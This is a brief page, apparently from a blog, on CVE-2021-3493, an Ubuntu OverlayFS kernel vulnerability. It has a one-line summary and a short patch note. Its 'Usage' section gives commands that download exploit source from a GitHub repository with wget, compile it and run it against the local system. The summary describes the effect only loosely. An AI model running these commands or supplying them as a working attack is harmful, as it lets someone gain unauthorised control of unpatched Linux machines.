CVE-2021-3493 - Exploit Summary & Demo
Summary
CVE-2021-3493 is a #linux-kernel exploit that basically takes vulnerable default configs for Ubuntu Linux kernels up to version 5.10 (Patched in 5.11) and gives access to the filesystem due to improper permission validation.
Usage
wget https://raw.githubusercontent.com/briskets/CVE-2021-3493/main/exploit.c -O overlayFS.c
gcc overlayFS.c -o overlayFS-Exploit
./overlayFS-Exploit
Demo
Patch
In Linux 5.11 the call to cap_convert_nscap was moved into vfs_setxattr